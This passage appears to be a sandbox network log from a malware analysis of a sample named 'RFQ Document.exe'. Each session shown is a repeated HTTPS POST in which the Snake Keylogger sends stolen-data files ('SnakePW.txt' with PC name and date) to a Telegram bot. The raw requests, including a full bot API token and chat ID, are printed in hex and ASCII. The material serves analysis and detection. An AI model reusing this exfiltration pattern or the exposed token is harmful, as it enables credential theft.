2021-09-28 06:00:03 UTC	506	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 33 35 65 34 62 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fa35e4b2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:03 UTC	507	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:03 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:03 UTC	507	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12903,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808803,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
321	192.168.2.4	50158	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:03 UTC	508	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fa67f5d6 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:03 UTC	508	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 36 37 66 35 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fa67f5d6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:03 UTC	508	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:03 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:03 UTC	509	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12904,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808803,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
322	192.168.2.4	50159	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:03 UTC	509	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fa9c6a51 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:03 UTC	509	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 39 63 36 61 35 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fa9c6a51Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:03 UTC	510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:03 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:03 UTC	510	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12905,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808803,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
323	192.168.2.4	50160	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:03 UTC	511	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fab6a4fe Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:03 UTC	511	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 62 36 61 34 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fab6a4feContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:04 UTC	511	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:04 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:04 UTC	512	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12906,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
324	192.168.2.4	50161	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:04 UTC	512	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fad0deec Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:04 UTC	513	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 64 30 64 65 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fad0deecContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:04 UTC	513	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:04 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:04 UTC	513	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12908,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
325	192.168.2.4	50162	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:04 UTC	514	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255faefdd62 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:04 UTC	514	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 61 65 66 64 64 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255faefdd62Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:04 UTC	515	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:04 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:04 UTC	515	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12909,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
326	192.168.2.4	50163	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:04 UTC	516	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fb0a16dc Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:04 UTC	516	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 30 61 31 36 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fb0a16dcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 06:00:04 UTC	516	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 06:00:04 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 06:00:04 UTC	517	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12910,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808804,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
327	192.168.2.4	50164	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 06:00:04 UTC	517	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255fb21ed31 Host: api.telegram.org Content-Length: 407
2021-09-28 06:00:04 UTC	517	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 62 32 31 65 64 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255fb21ed31Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
